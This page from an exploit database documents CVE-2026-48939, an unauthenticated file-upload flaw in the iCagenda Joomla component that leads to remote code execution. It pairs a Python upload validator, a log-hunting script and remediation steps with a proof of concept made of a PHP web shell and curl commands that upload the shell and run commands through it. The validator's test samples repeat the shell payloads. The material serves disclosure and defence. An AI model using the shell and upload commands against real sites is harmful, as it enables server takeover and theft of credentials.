## https://sploitus.com/exploit?id=A2DC23CB-0791-5A41-828F-25B34E8207C5
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE

## Overview

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |

## Vulnerability Description

iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.

### Technical Details

The vulnerability exists in the frontend event submission form's file attachment feature:

1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.

2. **No File Validation**: Uploaded files are saved with their original extension without:
   - Extension allowlist validation
   - MIME type verification
   - File content inspection

3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.

4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
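The three missing checks listed above, and the filename handling that would have contained the damage even if one of them slipped, as an added example. This is not iCagenda or Joomla code and does not claim to match the 4.0.8 fix; the allowlist, helper names and storage directory are assumptions chosen to show the pattern. Files are judged by every extension in the name (so `shell.php.png` is caught), by magic bytes against the claimed type, by a scan for script markers (catching a valid PNG with PHP appended), and are then written under a random server-chosen name with no execute bit.

```python
"""Hardened attachment handling: the checks the vulnerable submit handler lacks.

Added example (not iCagenda or Joomla code). Extension allowlist, magic-byte
check against the claimed type, content inspection for script markers, and a
random server-chosen filename. The allowlist and helper names are assumptions.
"""
import os
import re
import secrets
import tempfile

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "ics"}  # assumed policy
SCRIPT_EXTENSIONS = {"php", "phtml", "phar", "php5", "php7", "phps"}

# Bytes a file must begin with to be accepted as the claimed type.
MAGIC = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "ics": (b"BEGIN:VCALENDAR",),
}

# Script markers that have no business in an attachment of any allowed type
# (catches polyglots such as a real PNG with a PHP payload appended).
FORBIDDEN_CONTENT = re.compile(rb"<\?php|<\?=|<script\b", re.IGNORECASE)


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_attachment(original_name: str, data: bytes) -> str:
    """Return the normalised extension of an acceptable upload, else raise."""
    parts = os.path.basename(original_name).lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("no extension")
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f".{ext} not in allowlist")
    # shell.php.png: judge every extension in the name, not only the last one.
    if SCRIPT_EXTENSIONS & set(parts[1:-1]):
        raise UploadRejected("script extension inside filename")
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        raise UploadRejected("content does not match claimed type")
    if FORBIDDEN_CONTENT.search(data):
        raise UploadRejected("embedded script content")
    return ext


def store_attachment(original_name: str, data: bytes, store_dir: str) -> str:
    """Validate, then write under a random name the client never chose.

    store_dir should sit outside the web root (or have script execution
    disabled there) so a missed case still cannot be reached as a URL.
    """
    ext = validate_attachment(original_name, data)
    os.makedirs(store_dir, exist_ok=True)
    path = os.path.join(store_dir, f"{secrets.token_hex(16)}.{ext}")
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)  # readable by the app, never executable
    return path


# Constructed samples: benign files plus the upload shapes the advisory describes.
SAMPLES = {
    "shell.php": b"<?php system($_GET['cmd'] . ' 2>&1'); ?>",
    "shell.php.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "fake.pdf": b"<?php echo 'hi'; ?>",
    "poly.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8 + b"<?php system($_GET['cmd']); ?>",
    "notes.pdf": b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n",
    "event.ics": b"BEGIN:VCALENDAR\r\nVERSION:2.0\r\nEND:VCALENDAR\r\n",
}


def demo(store_dir: str = "") -> dict:
    """Run every sample through store_attachment; map name -> outcome."""
    store_dir = store_dir or tempfile.mkdtemp(prefix="attachments-")
    outcome = {}
    for name, data in SAMPLES.items():
        try:
            store_attachment(name, data, store_dir)
            outcome[name] = "stored"
        except UploadRejected as exc:
            outcome[name] = f"rejected: {exc}"
    return outcome


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15} {result}")
```

The order of the checks matters less than their independence: the allowlist alone is beaten by a double extension, the magic check alone is beaten by a polyglot, and the content scan alone is beaten by obfuscation, which is why the random filename and a non-executable storage location remain the backstop.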

## Proof of Concept

### Method 1: Using curl (Single Command)

```bash
# Create PHP shell payload (quoted heredoc so $_GET is not expanded by the shell)
cat > /tmp/shell.php <<'EOF'
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd'] . " 2>&1");
}
?>
EOF

# Upload the shell
curl -k -s \
  -F "title=Test Event" \
  -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
  "https://poloss-jomola.ddev.site/icagenda_submit.php"

# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```

### Method 2: Using PoC Script

```bash
# Navigate to project directory

# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```

## Exploitation Steps

1. **Identify vulnerable endpoint**:
   ```
   https://target.com/index.php?option=com_icagenda&task=submit
   ```

2. **Upload PHP web shell**:
   ```bash
   curl -X POST -F "jform[attachment]=@shell.php" \
     "https://target.com/index.php?option=com_icagenda&task=submit"
   ```

3. **Execute shell**:
   ```bash
   curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
   ```

## Impact

- **Confidentiality**: Complete loss of confidentiality - attacker can read every file the web server account can read, including the site configuration and database credentials
- **Integrity**: Complete loss of integrity - attacker can modify site files and all data reachable with those credentials
- **Availability**: Complete loss of availability - attacker can delete content or otherwise deny service
- **Remote Code Execution**: Arbitrary commands run as the web server user, giving full compromise of the host and a foothold for lateral movement

## Attack Signature

Based on real-world exploitation logs, the attack signature is:

```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"

# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
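A detection pass over web server access logs for the two-step signature above, as an added example that is not from the advisory or its author. It parses Apache/nginx combined-format lines, flags POSTs to the iCagenda submit task (both task names the advisory uses) and any request for a script-typed file under the attachments directory, then correlates the two per client IP. A 200 on a `.php` under that directory is treated as confirmation on its own, since nothing legitimate lives there. The log lines are constructed samples on documentation address ranges; the `icagenda-batch/1.0` User-Agent is reported only as a weak corroborating signal because it is trivially changed.

```python
"""Hunt for the CVE-2026-48939 signature in combined-format web access logs.

Added example, not from the advisory or its author. Flags a POST to the
iCagenda submit task and any request for a .php file under the attachments
directory, then correlates both per client IP. Log lines are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
ATTACHMENT_DIR = "/images/icagenda/frontend/attachments/"
SUBMIT_TASKS = {"submit", "registration.submit"}  # both names used in the advisory
SCRIPT_EXT = re.compile(r"\.(php|phtml|phar|php\d)(\.|$)", re.IGNORECASE)
KNOWN_UA = "icagenda-batch/1.0"  # UA seen in the advisory's logs; weak signal


def classify(line):
    """Return (kind, ip, status, ua) for an interesting line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["url"])
    qs = parse_qs(url.query)
    if (m["method"] == "POST" and qs.get("option", [""])[0] == "com_icagenda"
            and qs.get("task", [""])[0] in SUBMIT_TASKS):
        return ("upload", m["ip"], m["status"], m["ua"])
    # Any script-typed file under the attachments directory, whatever the
    # method or query string, is suspicious: nothing legitimate lives there.
    if url.path.startswith(ATTACHMENT_DIR) and SCRIPT_EXT.search(url.path):
        return ("exec", m["ip"], m["status"], m["ua"])
    return None


def analyze(log_text):
    """Correlate flagged lines per IP; map ip -> verdict string."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            seen[hit[1]].append(hit)
    verdicts = {}
    for ip, hits in seen.items():
        kinds = {h[0] for h in hits}
        served = any(h[0] == "exec" and h[2] == "200" for h in hits)
        if served:
            verdict = "CONFIRMED: php served from attachments dir"
        elif kinds == {"upload", "exec"}:
            verdict = "ATTEMPT: upload followed by shell request (not served)"
        elif "exec" in kinds:
            verdict = "PROBE: shell request without upload seen"
        else:
            verdict = "UPLOAD: submit POST, inspect attachments dir"
        if any(h[3] == KNOWN_UA for h in hits):
            verdict += " [known UA]"
        verdicts[ip] = verdict
    return verdicts


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2026:10:14:02 +0000] "POST /index.php?option=com_icagenda&task=submit HTTP/1.1" 303 0 "-" "icagenda-batch/1.0"
203.0.113.7 - - [21/Jun/2026:10:14:05 +0000] "GET /images/icagenda/frontend/attachments/shell.php?cmd=id HTTP/1.1" 200 57 "-" "icagenda-batch/1.0"
198.51.100.4 - - [21/Jun/2026:10:20:11 +0000] "GET /images/icagenda/frontend/attachments/flyer.pdf HTTP/1.1" 200 18233 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Jun/2026:11:02:44 +0000] "GET /images/icagenda/frontend/attachments/x.php?cmd=whoami HTTP/1.1" 404 196 "-" "curl/8.5.0"
192.0.2.10 - - [21/Jun/2026:11:30:00 +0000] "GET /index.php?option=com_icagenda&view=submit HTTP/1.1" 200 4402 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, verdict in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, verdict)
```

Run it against a real log with `analyze(open("/var/log/apache2/access.log").read())`; the `PROBE` verdict for a 404 is still worth keeping, because a scanner that tried `x.php` today will try the real filename once it has uploaded one.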

## Remediation

1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for the legacy branch)
2. **Alternative**: Remove or rename the `com_icagenda` folders temporarily until the update can be applied
3. **Note**: Unpublishing the component does NOT protect against this vulnerability; the submit endpoint stays reachable
4. **After patching**: Updating does not remove files an attacker already dropped. Check `/images/icagenda/frontend/attachments/` for `.php` or other script files, review access logs for the signature above, and treat any served shell as a full host compromise

## References

- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)

## Disclaimer

This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.